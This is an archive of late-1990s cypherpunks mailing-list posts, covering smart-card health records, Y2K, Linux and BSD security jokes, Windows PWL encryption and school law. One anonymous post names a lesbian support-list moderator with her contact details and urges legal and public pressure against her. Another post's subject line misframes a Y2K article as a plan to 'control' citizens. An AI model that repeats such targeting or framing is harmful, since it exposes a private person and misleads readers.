>- Frequently Asked Questions -
>
>Introduction to the Health Passport Project
>
>What is the Health Passport Project?
>
>The Health Passport Project is a three-city demonstration that uses what is
>called a "smart card" to put important health-related information at the
>fingertips of mothers and their children. People participating in the
>demonstration are those eligible for care under public health programs. The
>Health Passport Project is the largest health-care demonstration in the
>United States for smart cards and will be conducted over two years in the
>cities of Bismarck, North Dakota; Cheyenne, Wyoming; and Reno, Nevada. The
>project will demonstrate how people can use these electronic cards to give
>up-to-date information to their health-care providers, including physicians,
>nurses, nutritionists and early childhood educators.
>
>
>Food Retailers
>
>Grocers who handle thousands of checks for nutrition benefits will find the
>new system involves less paperwork, results in quicker check-out, and
>provides more timely reimbursement. The Health Passport works like a bank
>card at the check-out counter. Benefits are automatically downloaded to the
>client's card at the retailer. Distribution of WIC benefits will be
>demonstrated in Reno and Cheyenne.
>
>
>More About the Demonstrations
>Which public health programs are participating?
>
>---
>Bismarck, North Dakota
>
>The Family Doctors, Bismarck Burleigh Nursing, WIC, Head Start,
>Immunizations, Medicaid, the Optimal Pregnancy Outcome Program, and Maternal
>and Child Health
>
>Bertie Bishop
>(701) 255-3397
>
>---
>Cheyenne, Wyoming
>
>Cheyenne Children's Clinic, the University of Wyoming Family Practice
>Residency Center, Laramie County Public Health Nursing, Medicaid, WIC, Head
>Start, Maternal and Child Health, and Immunizations
>
>Terry Williams
>(307) 777-6008
>
>---
>Reno, Nevada
>
>WIC, Immunizations, and Head Start
>Marty Brown
>(702) 883-6992
>-------------------------------------------------
>
>http://www.westgov.org/hpp/
>
>http://www.westgov.org/wga/publicat/hppsum.htm
>
>Health Passport
>
>Information Technology: Toward a Health Card for the West
>
>"Congress is considering the most sweeping changes to the delivery of social
>services since the New Deal. In this environment, the Health Passport
>presents an innovative tool to help ensure the continued delivery of
>critical services to low income women and children--even as government
>sponsored programs are consolidated or eliminated. While devolution of
>authority to the states is expected to reduce duplicative federal
>administrative structures, the debate in Washington has done little to
>provide practical solutions. The Health Passport offers a tool to help
>achieve these administrative savings empowering citizens and preserving the
>integrity of services."
>
>=======================================================================
>Don't believe anything you read on the Net unless:
>1) you can confirm it with another source, and/or
>2) it is consistent with what you already know to be true.
>=======================================================================
>Reply to: <fingerprint@networkusa.org>
>=======================================================================
> To subscribe to the free Scan This News newsletter, send a message to
>     <majordomo@efga.org> and type "subscribe scan" in the BODY.
>    Or, to be removed type "unsubscribe scan" in the message BODY.
>   For additional instructions see www.efga.org/about/maillist.html
>-----------------------------------------------------------------------
>             "Scan This News" is Sponsored by S.C.A.N.
>           Host of the "FIGHT THE FINGERPRINT!" web page:
>                www.networkusa.org/fingerprint.shtml
>=======================================================================
>


--part0_914875392_boundary--

-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: USCMike1@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Dec 1998 16:33:38 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: United Nations plans SWAT team training to "control" citizens in Y2K crash
Message-ID: <199812290802.AAA28246@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: USCMike1@aol.com
Subject: SNET: United Nations plans SWAT team training to "control" citizens in Y2K crash
Date: Mon, 28 Dec 1998 15:34:16 EST
To: KatieSouix@aol.com


->  SNETNEWS  Mailing List

This is a multi-part message in MIME format.

--part0_914877258_boundary
Content-ID: <0_914877258@inet_out.mail.aol.com.1>
Content-type: text/plain; charset=US-ASCII


--part0_914877258_boundary
Content-ID: <0_914877258@inet_out.mail.netdoor.com.2>
Content-type: message/rfc822
Content-transfer-encoding: 7bit
Content-disposition: inline

Return-Path: <kepi@netdoor.com>
Received: from  rly-zd05.mx.aol.com (rly-zd05.mail.aol.com [172.31.33.229]) by
	air-zc01.mail.aol.com (v53.20) with SMTP; Sun, 13 Dec 1998 23:22:22
	1900
Received: from netdoor.com (netdoor.com [208.137.128.6])
	  by rly-zd05.mx.aol.com (8.8.8/8.8.5/AOL-4.0.0)
	  with ESMTP id XAA17219;
	  Sun, 13 Dec 1998 23:22:12 -0500 (EST)
Received: from kepi (port201.hat.netdoor.com [208.137.155.201])
	by netdoor.com (8.9.1/8.9.1) with SMTP id WAA26607;
	Sun, 13 Dec 1998 22:21:38 -0600 (CST)
Message-Id: <3.0.5.32.19981213222221.008aa4b0@mail.netdoor.com>
X-Sender: kepi@mail.netdoor.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Sun, 13 Dec 1998 22:22:21 -0600
To: Kepi <kepi@netdoor.com>
From: Kepi <kepi@netdoor.com>
Subject: Nations at UN conference suggest SWAT teams to handle Y2K
  crises
Mime-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable

Source: Star-Telegram.Com
http://www.star-telegram.com/news/doc/1047/1:COMP73/1:COMP73121298.html


Updated: Saturday, Dec. 12, 1998 at 17:58 CST 

Nations at UN conference suggest SWAT teams to handle Y2K crises

By Leslie J. Nicholson
Knight Ridder Newspapers

NEW YORK -- In a stark demonstration of the global scale of the Year 2000
computer problem, representatives of 130 nations gathered at the United
Nations Friday to hammer out plans for dealing with Y2K. 

The ideas included setting up national and international "SWAT teams" to
handle crises caused by the computer glitch.

The U.N. conference marked the first such gathering of Y2K coordinators
from several nations, including many developing countries that lag far
behind the United States in remediation efforts.

Y2K refers to a programming glitch that will cause some computers, softwar=
e
programs and microprocessors to interpret the abbreviated date 00 as 1900
rather than 2000. The result could be incorrect data processing and
equipment malfunctions.

"We all know that we are competing in a race against time," said Pakistani
ambassador Ahmad Kamal, who hosted the conference. "Despite all the effort=
s
and committed work of individuals and institutions, we are far from the
objective of ensuring Y2K compliance by the inflexible deadline of Dec. 31=
,
1999."

Fixing Y2K problems is a daunting task that involves rewriting computer
codes and potentially replacing billions of microchips.

U.N. Undersecretary-general Joseph E. Connor called Y2K the largest
computer project in the 50-year history of the information-technology
industry, but said predicting its effects accurately was impossible. He
said the global cost of fixing Y2K problems could reach as high as $600
billion with an additional $1.4 trillion going for litigation.

"There's no way to draw on past experience and predict what is going to
fail and what consequences these failures will have," Connor said. "All we
know for sure is the timing."

He said nations should attack Y2K on two fronts: by deciding which systems
are critical and fixing them first, and by developing contingency plans fo=
r
coping with computer failures.

"We have to get used to the fact that some systems and facilities will not
be addressed," Connor said.

Delegates spent most of the day in closed-door sessions to discuss Y2K
problems affecting specific industries and regions and released few detail=
s
of those meetings. One goal was to organize on a regional basis, including
implementing the SWAT-team idea. Kamal told reporters that such teams woul=
d
help nations deal with problems that cross borders, such as regional power
grid failures.

"You cannot stop at the political border of a country," he said.

Distributed by The Associated Press (AP) 

=A9 1998 Star-Telegram

###

=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=
=A9~=A9~=A9~=A9~=A9~=A9

**COPYRIGHT NOTICE** In accordance with Title 17 U.S.C. Section 107,
any copyrighted work in this message is distributed under fair use without
profit or payment to those who have expressed a prior interest in receivin=
g
the included information for non-profit research and educational purposes
only.  [ Ref. http://www.law.cornell.edu/uscode/17/107.shtml ]

=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=A9~=
=A9~=A9~=A9~=A9~=A9~=A9


--part0_914877258_boundary--

-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: USCMike1@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: questions@daikihaku.dk
Date: Tue, 29 Dec 1998 10:01:53 +0800
To: cypherpunks@toad.com
Subject: New Martial Arts Organisation
Message-ID: <199812290124.CAA08748@saturn.infoserv.dk>
MIME-Version: 1.0
Content-Type: text/plain



This e-mail is to inform you, that we have started a non-profit
friendship association called Friends of the Fighting Spirit.
 
Through the years, we have established many contacts in
different countries. Now, together with all other interested
people worldwide, it 's possible through Dai Ki Haku to become
member of the non-profit friendship association Friends of
the Fighting Spirit
 
Our intention is to provide all forms of martial arts and combatants
with the opportunity of to derive knowledge from each other in various
ways, respective of different individual levels, religions and culture.
 
If you are accepted as a member, you will never have to pay anything
for you membership. Both individuals and clubs can become
members. 
By visiting the below web-site, you will be able to read some material
about Friends of the Fighting spirit.
 
http://ffs.daikihaku.dk/
 
The material includes information and replies to questions about why Friends
of the Fighting Spirit is quite special within Martial Art.
 
Please take the time to read the entire material so that we may have some
well-considered applications for membership.
 
On behalf of
Shihan Oerum
 
---
(Please note that this is not a commercial e-mail, this is a non-profit organisation.
Your have received this e-mail because of your interest in Martial Art, and you
will not receive any more e-mail's if you decide not to join the organisation.)
---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Dec 1998 10:01:44 +0800
To: cypherpunks@Algebra.COM
Subject: kha0S Linux
Message-ID: <199812290136.CAA06352@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




kha0S Linux is a new distribution currently in
development. The primary goal of this project is to
integrate and embed strong cryptography within a robust
Linux distribution. kha0S is currently seeking the
assistance of developers with strong backgrounds in
cryptography and source code security auditing. Please
visit the homepage for additional information. 

http://kha0s.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Dec 1998 11:12:40 +0800
To: cypherpunks@toad.com
Subject: Re: Anna Holmes, MarBLes, and the Married Lesbian Underground
Message-ID: <199812290246.DAA10919@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <368690ea.96913979@news.mindspring.com>,
  equinox44@mindspring.com wrote:

> >The idea of using men as "a sperm bank with a checkbook" is really
> >insidious, but by the time many of the victims of this deception
> >find out they've been deceived and used, it's too late.  The above
> >URL, BTW, says that the list has a panel of six formerly married
> >lesbians for "support", which seems to be a euphemism for coaching.
> >Since marriage is a civil contract I wonder if such willful
> >"interference with the performance of a contract" has ever been
> >redressed in court.
> 
> One may not be able to go after the 'support group', but there is
> legal precedence in the US allowing a person to bring action against a
> spouse who marries them with fraudulent intent.    Even if that fraud
> is marrying someone they don't love after professing love.
> 
> OTOH, I imagine that one could include the 'support group' in any
> civil or legal action as co-conspirators.

I visited Anna Holmes' <fogbow@sprynet.com> (the moderator of the
Married but Lesbian [MarBLes] mailing list) website at
http://home.sprynet.com/sprynet/fogbow/ and discovered that she's a
licensed shrink who lives in Birmingham, AL.  Thus, there may be
some "deep pockets" in the form of her malpractice insurance, as
well as the hosts of the mailing list itself, queernet.org.

I'm not sure what sort of other action is possible, but I'm sure if
Holmes were "supporting" the defrauding of African Americans rather
than married men, Jesse Jackson would figure out a way to bring some
pressure to bear against her and those aiding and abetting her
clandestine activities.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Rowley <bc192@freenet.carleton.ca>
Date: Tue, 29 Dec 1998 17:32:56 +0800
To: cypherpunks@cyberpass.net
Subject: PWL files
Message-ID: <199812290909.EAA22365@freenet3.carleton.ca>
MIME-Version: 1.0
Content-Type: text



I've been trying to figure out the method of encryption for OSR2 Win95 and
Win98 *.pwl files and I was hoping someone had some details about the
method used. I've been told that resources are encrypted using RC4 with
a MD5 hash of the password as the key, although I haven't had any luck
using this information to decrypt resources with a known password. 
Does anyone have it figured out?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Tue, 29 Dec 1998 19:05:00 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: Re: New! Active Virtual Firewall
Message-ID: <199812290942.EAA158.53@whgiii>
MIME-Version: 1.0
Content-Type: text/plain

I thought this may be of interest (or at least a chuckel).

-------------------------------------------------------------------------
The following message is forwarded to you by "William H. Geiger III"
<whgiii@openpgp.net> (listed as the From user of this message).  The
original sender (see the header, below) was jim kalember
<kalember@ix.netcom.com> and has been set as the "Reply-To" field of this
message.
-------------------------------------------------------------------------
>Newsgroups: comp.os.os2.networking.tcp-ip
>Subject: New! Active Virtual Firewall
>Date: Mon, 28 Dec 1998 22:36:56 -0800
>Organization: PAL
>Message-ID: <36887888.3A995E06@ix.netcom.com>
>NNTP-Posting-Host: whx-ca1-23.ix.netcom.com
>Mime-Version: 1.0


We have just completed technology validation demo for an "active virtual
firewall" that utilizes a new technique, software genetics, to secure
remotes and hosts. Technical details are available from
<kalember@stanford.edu>. The approach is virtually impervious to a text
hack and should be investigated by anyone serious about securing VPN to
Internet portals, or any private network. This is new technology--no data
is encrypted.

Technical details from our developers at <kalember@stanford.edu>.

--
Jim Kalember
VP Technical Staffing
Professional Access Limited

-----------------------------------------------------
 -- End of forwarded message
-----------------------------------------------------
-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------

We have just completed technology validation demo for an "active virtual
firewall" that utilizes a new technique, software genetics, to secure
remotes and hosts. Technical details are available from <kalember@stanford.edu>.
The approach is virtually impervious to a text hack and should be investigated
by anyone serious about securing VPN to Internet portals, or any private
network. This is new technology--no data is encrypted.

Technical details from our developers at <kalember@stanford.edu>.

--
Jim Kalember
VP Technical Staffing
Professional Access Limited
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 29 Dec 1998 08:22:00 +0800
To: cypherpunks@toad.com
Subject: Re: Mail2news@anon.lcs.mit.edu Not Propagating to Compuserve/Sprynet
In-Reply-To: <199812281554.QAA18888@replay.com>
Message-ID: <3.0.5.32.19981229094117.00981d30@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 04:54 PM 12/28/98 +0100, Anonymous wrote:
>On 28 Dec 1998, Anonymous wrote:
>
>>Has anyone else experienced posts sent via the anon.lcs.mit.edu
>>mail2news gateway not propagating to Compuserve/Sprynet's news
>>servers?  I've made a couple of posts, both anonymously and
>>non-anonymously via that gateway, and they haven't been showing up
>>at CIS/Sprynet.  Yet they've been archived on Dejanews and replies
>>to them from users on other servers have shown up.
>>
>>Is this a propagation problem, or are Compuserve and Sprynet
>>blocking posts from that gateway?
>
>Hey! Stop abusing the anonymous remailers! Your identity isn't findable! It
>defeats the whole purpose of Anon!
>
>Fleaza!

Eh? 

This wasn't me. Fuck off.

Reeza!
============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 29 Dec 1998 17:39:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: SNET: United Nations plans SWAT team training to "control" citizens in Y2K crash
In-Reply-To: <199812290802.AAA28246@netcom13.netcom.com>
Message-ID: <36889DC9.FF8245BE@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri wrote:
> 
> From: USCMike1@aol.com


> 
> NEW YORK -- In a stark demonstration of the global scale of the Year 2000
> computer problem, representatives of 130 nations gathered at the United
> Nations Friday to hammer out plans for dealing with Y2K.
> 
> The ideas included setting up national and international "SWAT teams" to
> handle crises caused by the computer glitch.
> 
> The U.N. conference marked the first such gathering of Y2K coordinators
> from several nations, including many developing countries that lag far
> behind the United States in remediation efforts.
> 
> Y2K refers to a programming glitch that will cause some computers, softwar=
> e
> programs and microprocessors to interpret the abbreviated date 00 as 1900
> rather than 2000. The result could be incorrect data processing and
> equipment malfunctions.

Is is (approximately) known how many percent of the owners of computer
systems have ever tried with some test cases to find out whether
their hardware/software could be susceptible to the Y2K problem?
I guess such tests would deliver some confidence intervals of
whether the problem could actually arise at 2000.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Dec 1998 01:14:45 +0800
To: cypherpunks@cyberpass.net
Subject: FW: Repeal Compulsory-School Laws?
Message-ID: <v04020a9bb2aeb4508f50@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: Carla Howell <carlahowell@mediaone.net>
To: "General lpma (E-mail)" <general@lpma.org>
Subject: FW: Repeal Compulsory-School Laws?
Date: Tue, 29 Dec 1998 10:45:41 -0500
Sender: owner-general@lpma.org



-----Original Message-----
From:	Jack Shimek [SMTP:jshimek@jaqboot.mv.com]
Sent:	Saturday, December 26, 1998 11:06 AM
To:	Jack Shimek
Subject:	Repeal Compulsory-School Laws?

Separation of School and State Alliance - New Hampshire
********************************************
The following article is brought to you courtesy of SepSchool-NH
If you wish to be removed from this mailing list, please reply with your
request to be removed.  Thank you.
********************************************


*****REPEAL COMPULSORY-SCHOOL LAWS? *****
Backers Say Learning And Innovation At Stake
Date:	12/2/98         Author: Aaron Steelman
	(c) Copyright 1998 Investors Business Daily, Inc.

Three years ago, state Rep. Russell George, a Republican, offered an
amendment to repeal the Colorado law that mandates school attendance for
children between ages 6 and 16.  George's reason: Disruptive kids who would
rather not be in school were causing problems for attentive students.  "I
posed a simple theory," George said. "If you want better education, then
you are better off having people in the system who want to learn. We
shouldn't be using schools as juvenile justice detention centers.  "That
forces learning at the lowest common denominator.  And until we figure that
out, we are not going to get a handle on why the public schools aren't
doing well," he said.
What's more, some critics of the attendance laws say repealing them could
lead to a flowering of innovative private schools.  Repeal also could free
the estimated 1.7 million children who are schooled at home from burdensome
regulations.  Such benefits, analysts say, could entice other states to
follow Colorado's lead and reconsider the wisdom of compulsory school
attendance.  Every state requires children to attend school until they earn
a high-school diploma or until they reach a certain age, typically 16 or
18.  Massachusetts passed the first compulsory-schooling law in 1852.  Most
states (and former territories) followed suit over the next several
decades.  George's amendment to repeal the compulsory-attendance laws died
in committee, but many parents and frustrated teachers supported the change.
The idea was particularly popular in rural western Colorado. But it had
supporters statewide, says Arthur Ellis, assistant commissioner of the
Colorado Department of Education.  "I wouldn't be surprised if we saw a
similar bill brought forward in the next session," Ellis said. If so, it
will have a powerful champion in George, who is the new speaker of the
Colorado House.
Colorado's education establishment is not keen on repealing the state's
century-old attendance laws, however.  By repealing its attendance laws,
the state would be "abandoning" its responsibility to kids, says Jeanne
Beyer, director of communications for the Colorado Education Association.
Democrat Michael Feeley, minority leader of the Colorado Senate, said: "We
would grow an underclass of uneducated, unemployable, illiterate kids who
would be sticking a gun in your ribs because that's the only thing they
would be capable of doing."
On the contrary, "It's actually the system that has abandoned the kids,"
said Sheldon Richman, senior fellow at the Future of Freedom Foundation.
"It sticks them in a custodial facility and lets them languish."
Richard Seder, education studies director at the Reason Public Policy
Institute in Los Angeles, said that compulsory attendance can contribute to
violence in the schools.  "A student who doesn't want to be at school and
is forced to be there will act out, (either) through intimidation of other
students or intimidation of teachers and administrators," Seder said.
It's not clear that repealing compulsory-attendance laws would actually put
kids on the streets, says E.G. West, an emeritus economics professor at
Carleton University in Ottawa, Ontario, and author of "Education and the
State." West studied compulsory-attendance laws in Britain and found that
education was widespread before schooling was mandatory and free.  "There
were upward trends in both literacy and school attendance" before
compulsory-schooling laws passed, West said.  In the mid-1800s, school
attendance rates were growing twice as fast as the population. By 1870, the
British literacy rate was more than 90%, and nearly all kids received some
formal schooling.  What's more, many youths benefited from apprenticeship
programs. "A lot of the firms that employed younger people provided them
with education on the job," West said.
If all that's true, why were the compulsory-attendance laws passed in the
first place?
"I think the primary reason was to eliminate competition in the labor
force," said Mary Novello, author of "For All the Wrong Reasons: The Story
Behind Government Schools." She says some of the support for mandatory
schooling came from labor organizers who thought young workers were taking
jobs from adults.
Marshall Fritz, director of the Fresno, Calif.-based Separation of School &
State Alliance, thinks that the attendance laws create an artificial
distinction between campus schooling and everyday, less-formal learning.
If the laws are repealed, he says, that distinction will be blurred, and
innovative schools will prosper. That's badly needed, Fritz says, because
most private schools now mirror the public schools in their approach. "I
think the government schools are teaching the kids to run a 17-minute
mile," he said. "The private schools are teaching them to run a 13- or
14-minute mile.  And they look great in comparison, because in the race of
the slow, someone has to be first."
Richman, the author of "Separating School and State," shares Fritz's
frustration about private schools' lack of creativity. But he's less
optimistic about alternative schools sprouting up.  For that to happen, he
says, it may be necessary to eliminate the taxes that fund public schools
as well as to repeal attendance laws.  "When Christopher Whittle set up the
Edison Project (a system of private, for-profit schools), he said he was
going to reinvent the school. But he ran up against the problem that a lot
of people who were already paying taxes for schools didn't also want to
spend money for tuition," Richman said.
However, repealing compulsory-attendance laws would instantly make life
easier for many home-schoolers, says Michael Farris, father of 10
home-schooled children and president of the Home School Legal Defense
Association in Purcellville, Va.  The laws not only say that kids must go
to school, but they also define what is and is not a school, Farris says.
Consider the case of Stephen and Lois Pustell of Lynn, Mass. They home
school their three school-aged children. They've been in a court battle
with their local school district since '91.  The school district says it
should be able to inspect the family's home to see how the kids are being
taught.  The Pustells object. "In our case, they were willing to waive all
the other requirements (for home-schoolers, including an annual review of
the curricula and the students' progress) except for the home visits," Mr.
Pustell said.
"Without the compulsory-attendance law, there would be no justification at
all for what they are trying to do."
Despite the Pustells' situation, Farris says home-schoolers are having
fewer problems now than in the past.  "There's no question that things have
moved in a more lenient direction in the last 15 years. If you were a
home-schooler in the early '80s, there was a high probability that you
would be prosecuted," Farris said.
In '96, Hawaii lowered its compulsory-attendance age to 16 from 18. Other
states have considered similar changes. Will Colorado go all the way and
repeal its attendance laws?
Ellis said that the Colorado Department of Education isn't "going to lead
the charge to repeal the laws, but we're not going to put any energy into
preserving them, either."
But you can count on teachers unions to put up a fight.  "Even though you
could probably find lots of frustrated teachers (who would like to see the
attendance laws repealed), organizationally we wouldn't support that," the
Colorado Education Association's Beyer said.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Dec 1998 03:06:16 +0800
To: cypherpunks@cyberpass.net
Subject: OpenBSD vs FreeBSD
Message-ID: <v04020a9fb2aece2a9ce1@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Tue, 29 Dec 1998 11:43:47 -0500
To: 0xdeadbeef@substance.abuse.blackdown.org
Subject: OpenBSD vs FreeBSD
Date: Tue, 29 Dec 1998 11:47:08 -0500
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: Nev Dull <nev@bostic.com>
Forwarded-by: Satya Palani <satya@gho.st>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Date: Sun, 6 Dec 1998 20:44:53 -0500 (EST)
From: Robert Watson <robert@cyrus.watson.org>
Subject: Re: OpenBSD vs FreeBSD


On 5 Dec 1998, Julian Assange wrote:

>> 	Do you really expect people here, on this list to say
>> 	"Use OpenBSD" or "Use Linux" or etc?
>
> `Use NetBSD'

Use a toaster oven.  Toaster ovens have excellent network security
characteristics.  For example, they are not susceptible to any IMAP-based
buffer overflow attacks; additionally, current toaster ovens are not known
to have any bugs in their TCP/IP stacks, nor have been vulnerable to any
in the recent past (according to CERT advisories, anyway).  Toaster ovens
require console access to perform administrative functions (such as
modification of temperature settings), but this will not impede deployment
in a number of environment.

Toaster ovens may be vulnerable to a remote denial of service attack
involving manipulation of power lines -- however, most operating systems
running on standard hardware are also vulnerable to this attack.

I have found that my toaster oven has served me well for a number of
years, and produces excellent grilled cheese sandwiches, which is far
better than my pentium running FreeBSD, largely because the cooling fan
on the pentium does too good a job.  Go figure.  Maybe if I get a pentium
pro?  Neither my FreeBSD box nor my toaster oven has suffered from a
security problem in a while.

  Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73  25 6D 10 FC EC 68 C1 1C

Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Date: Sun, 6 Dec 1998 21:44:36 -0500 (EST)
From: Robert Watson <robert@cyrus.watson.org>
Subject: Re: OpenBSD vs FreeBSD


On Sun, 6 Dec 1998, Robert Watson wrote:

> Use a toaster oven.  Toaster ovens have excellent network security
> characteristics.  For example, they are not susceptible to any IMAP-based
> buffer overflow attacks; additionally, current toaster ovens are not known

A friend of mine points out that toaster ovens are susceptible to a buffer
overflow involving pieces of bread exceeding the safe bread limit in the
oven, which can result in a fire, or at the very least, a lot of burnt
bread.  As such, I am no longer planning to deploy toaster ovens as web
servers on our network.

Apologies for any misleading details concerning the reliability of toaster
ovens in hostile environments -- I hope no one has made purchasing
decisions based on this misinformation!

  Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73  25 6D 10 FC EC 68 C1 1C

Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 30 Dec 1998 02:32:37 +0800
To: bc192@freenet.carleton.ca
Subject: Re: PWL files
In-Reply-To: <199812290909.EAA22365@freenet3.carleton.ca>
Message-ID: <199812291333.NAA03382@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Chris Rowley <bc192@freenet.carleton.ca> writes:
> I've been trying to figure out the method of encryption for OSR2 Win95 and
> Win98 *.pwl files and I was hoping someone had some details about the
> method used. [...] Does anyone have it figured out?

I think Peter Gutmann and someone else figured it out sometime ago.
Probably you could find the info on Peter's web page:

	http://www.cs.auckland.ac.nz/~pgut001/

or search the archives for "PWL" && "windows".

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Lanett" <mlanett@frohike.com>
Date: Wed, 30 Dec 1998 08:53:18 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: OpenBSD vs FreeBSD
Message-ID: <003901be337d$e533d320$010101c0@aboutbox.meer.net>
MIME-Version: 1.0
Content-Type: text/plain



Use an etch-a-sketch. Etch-a-sketch displays are not vulnerable to
power-line denial-of-service attacks or fires. They *are* vulnerable to data
loss during earthquakes or if physical access is obtained, however most
operating systems running on standard hardware are also vulnerable to
attacks of this nature. They are not vulnerable to remote electronic
eavesdropping, as they emit no power signature, in fact no emissions of any
kind. I am not familiar with TEMPEST specifications, however, and can not
claim this level of security.

~mark

From: Robert Watson <robert@cyrus.watson.org>


>Use a toaster oven.
[...]
>Toaster ovens may be vulnerable to a remote denial of service attack
>involving manipulation of power lines -- however, most operating systems
>running on standard hardware are also vulnerable to this attack.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Dec 1998 08:53:32 +0800
To: cypherpunks@cyberpass.net
Subject: CLT&G Update: 29 Dec 98
Message-ID: <v04020aa3b2aee48de0d8@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Chip Ford" <chip_ford@cltg.org>
To: "MassLP Reflector" <general@lpma.org>,
        "MassGOP Listserv" <debate@list1.channel1.com>
Subject: CLT&G Update: 29 Dec 98
Date: Tue, 29 Dec 1998 14:31:11 -0500
Sender: owner-general@lpma.org



             Citizens for Limited Taxation & Government
                 PO Box 408 * Peabody, MA 01960
           Phone: (508) 384-0100 * E-Mail: cltg@cltg.org
               Visit our website at:  http://cltg.org
  ---------------------------------------------------------------

                      *** CLT&G Update ***
                   Tuesday, December 29, 1998


  The Boston Globe
  Monday, December 28, 1998

  The US suffered through turmoil in '98 -- 1798, that is
  By Jeff Jacoby, Globe Columnist, 12/28/98

     So shocking were the president's deeds, so extreme were his
  opponents, so furiously did partisan passions roil the public,
  that by the end of '98 some of the nation's most eminent
  leaders were questioning whether America's experiment with
  constitutional democracy was coming undone.

     No, not the Clinton scandals. The year was 1798. John Adams
  was in the White House and the United States was undergoing an
  agony of political turmoil. It was a bitter time, but it
  produced two of the most remarkable statements on liberty and
  limited government in our history - the Kentucky and Virginia
  Resolutions of 1798.

     Americans were sharply divided over a host of issues that
  year, none more so than US-French relations. The Federalists,
  who controlled the presidency and both houses of Congress,
  deeply mistrusted the French revolutionaries and refused to
  support them when France went to war with Britain. Republicans
  led by Thomas Jefferson were sympathetic to the French cause,
  which they identified with America's own revolt against royal
  abuse two decades earlier. The Jeffersonians denounced Adams
  and the Federalists as "monarchists" and "Tories" -
  denunciations echoed by a growing population of anti-British
  immigrants.

     Angered by Washington's neutrality, France began seizing
  American vessels. US diplomats in France were snubbed. A
  scandal erupted - the famous XYZ Affair - when agents of the
  French foreign minister, Talleyrand, demanded a bribe from
